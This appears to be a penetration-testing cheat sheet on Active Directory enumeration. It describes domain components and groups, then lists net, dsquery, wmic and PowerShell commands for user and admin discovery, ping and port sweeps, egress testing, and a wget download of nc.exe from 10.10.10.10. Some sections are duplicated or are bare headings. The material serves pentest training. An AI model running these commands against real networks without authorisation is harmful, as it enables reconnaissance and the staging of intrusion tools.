Active Directory Enumeration
Enumerating Active Directory can provide valuable information about the network's structure and potential vulnerabilities during penetration testing
Active Directory Components
Domain Controllers:
Holds the AD DS data store
Handles authentication and authorization services
Replicate updates from other domain controllers in the forest
Allows admin access to manage domain resources
AD DS Data Store:
Contains NTDS.dit which contains all AD DC information including password hashes for domain users
Stored by default in %SystemRoot%\NTDS
Accessible only by the domain controller
Forest
Container that holds pieces of AD network
Forest is a collection of one or more domain trees inside
Forest consists of:
Trees - A hierarchy of domains in Active Directory Domain Services
Domains - Used to group and manage objects
Organizational Units (OUs) - Containers for groups, computers, users, printers and other OUs
Trusts - Allows users to access resources in other domains
Objects - users, groups, printers, computers, shares
Domain Services - DNS Server, LLMNR, IPv6
Domain Schema - Rules for object creation
Users
4 primary types of user accounts:
Domain admins
Service accounts
Local administrators
Domain users
Groups
Distribution groups: specify email distribution lists
Security groups: specify permissions for large number of users, including the following default security groups:
Domain Controllers - All domain controllers in the domain
Domain Guests - All domain guests
Domain Users - All domain users
Domain Computers - All workstations and servers joined to the domain
Domain Admins - Designated administrators of the domain
Enterprise Admins - Designated administrators of the enterprise
Schema Admins - Designated administrators of the schema
DNS Admins - DNS Administrators Group
DNS Update Proxy - DNS clients who are permitted to perform dynamic updates on behalf of some other clients (such as DHCP servers).
Allowed RODC Password Replication Group - Members in this group can have their passwords replicated to all read-only domain controllers in the domain
Group Policy Creator Owners - Members in this group can modify group policy for the domain Denied RODC Password Replication Group - Members in this group cannot have their passwords replicated to any read-only domain controllers in the domain
Protected Users - Members of this group are afforded additional protections against authentication security threats. See http://go.microsoft.com/fwlink/?LinkId=298939 for more information.
Cert Publishers - Members of this group are permitted to publish certificates to the directory
Read-Only Domain Controllers - Members of this group are Read-Only Domain Controllers in the domain
Enterprise Read-Only Domain Controllers - Members of this group are Read-Only Domain Controllers in the enterprise
Key Admins - Members of this group can perform administrative actions on key objects within the domain.
Enterprise Key Admins - Members of this group can perform administrative actions on key objects within the forest.
Cloneable Domain Controllers - Members of this group that are domain controllers may be cloned.
RAS and IAS Servers - Servers in this group can access remote access properties of users
Domain Trusts
Put rules into place about domain interactions
Trusts allow users to gain access to other domain resources
Types of trusts:
Directional - The direction of the trust flows from a trusting domain to a trusted domain
Transitive - The trust relationship expands beyond just two domains to include other trusted domains
Domain Policies
Like domain groups, except instead of permissions they contain rules
Active Directory Domain Services
Services that a domain controller provides to the rest of the domain or tree
CMD Tools
Domain User Info with CMD
Domain Groups (run on DC)
net
net user
Dsquery User List
dsquery
dsquery user domainroot
User Logon Name with Email
dsquery
dsquery * domainroot -filter "(&(objectCategory=Person)(objectClass=User)(mail=e-mailaddress))" -attr name
Domain Admins of with Remote Trused Domain
dsquery
dsquery * -filter "(cn=Domain Admins)" -attr member -d trustedDomain
Domain Users
wmic
wmic /NAMESPACE:\\root\directory\ldap PATH ds_user GET ds_samaccountname
Domain Groups
wmic
wmic /NAMESPACE:\\root\directory\ldap PATH ds_group GET ds_samaccountname
Domain Computers
wmic
wmic /NAMESPACE:\\root\directory\ldap PATH ds_computer GET ds_samaccountname
View Domain User Info
net
net user /domain net user pentestuser /domain
Domain Admin Users
net
net group “Domain Admins” /domain
Enumerating with PowerShell
Show SET
Get-ChildItem
Get-ChildItem Env:
| ft Key,Value
Get Connected Drives
Get-PSDrive
Get-PSDrive
| where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}
| ft Name,Root
Ping Sweeper
echo
1..255
| % {echo "192.168.1.$_"; ping -n 1 -w 100 192.168.1.$_
| Select-String ttl}
Port Sweeper
echo
1..1024
| % {echo ((new-object Net.Sockets.TcpClient).Connect("<IPADDR>", $_)) "Port $_ is open!"} 2>$null
Sweep Range of IPs for Single Port
Test-NetwConnection
foreach ($ip in 1..20) {Test-NetConnection -Port 80 -InformationLevel "Detailed" 192.168.1.$ip}
Sweep IPs and Ports
New-Object
1..20
| % { $a = $_; 1..1024
| % {echo ((new-object Net.Sockets.TcpClient).Connect("10.0.0.$a",$_)) "Port $_ is open!"} 2>$null}
Test Egress Filtering
New-Object
1..1024
| % {echo ((new-object Net.Sockets.TcpClient).Connect("allports.exposed",$_)) "Port $_ is open" } 2>$null
Show Domain Admins
ADSI
([adsisearcher]'(memberOf=cn=Domain Admins,CN=Users,dc=contoso,dc=com)').FindAll()
Show Accounts that Don't Lock Out
dsquery
dsquery * -filter "(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=65536))"
Web Client to Download Files (eg NetCat)
wget
wget "http://10.10.10.10/nc.exe" -outfile "c:\nc.exe"
Get Firewall Rules
Get-NetFirewallRule
Get-NetFirewallRule -all | Out-GridView` or `Get-NetFirewallRule -all | Export-csv <file_path.csv>
A simple batch script with these commands is here: \tools\WinDomainEnum.bat
Display DC Address, Domain Name, Roles
Dsquery User List
User Logon Name from Email
Display Trusted Domain
Domain Admins of from Remote Trused Domain
Display All Domain Users
Display All Domain Groups
Display All Domain Computers
View Domain User Info
Display Domain Admin Users
View All Hosts in Domain/Workgroup
Display Network Shares
Display Domain Trust Info
PowerShell Tools
Ping Sweeper
Port Sweeper
Sweep Range of IPs for Single Port
Sweep IPs and Ports
Test Egress Filtering
Display Domain Admins
Display Accounts that Don't Lock Out
Web Client to Download Files (eg NetCat)
Get Firewall Rules
Add Firewall Rule
Generate CSV with User Info
Linux/Kali Tools
SMB Enumeration Tools
Discover Windows / Samba servers on subnet, finds Windows MAC addresses, netbios name and discover client workgroup / domain
Do Everything, runs all options (find windows client domain / workgroup) apart from dictionary based share name guessing
Fingerprint SMB Version
Find open SMB Shares in Nmap
Enumerate SMB Users in Nmap
Enumerate SMB Using Samrdump Python Impacket
Linux/Kali Tools
SMB Enumeration Tools
Discover Windows / Samba servers on subnet, finds Windows MAC addresses, netbios name and discover client workgroup / domain
Do Everything, runs all options (find windows client domain / workgroup) apart from dictionary based share name guessing
Fingerprint SMB Version
Find open SMB Shares in Nmap
Enumerate SMB Users in Nmap
Enumerate SMB Using Samrdump Python Impacket
ridenum.py 192.168.XXX.XXX 500 50000 dict.txt https://github.com/trustedsec/ridenum
Metasploit RID Cycling
Resources
https://www.hackingarticles.in/impacket-guide-smb-msrpc/
https://www.sans.org/blog/pen-test-poster-white-board-powershell-built-in-port-scanner/
A simple batch script with these commands: \tools\WinNetEnum.bat
A simple batch script with these commands is here: \tools\WinDomainEnum.bat
"C:\Code\Penetration-Testing - Working\tools\WindowsEnum.ps1"
"C:\Code\Penetration-Testing - Working\tools\WinUserEnum.bat"
Last updated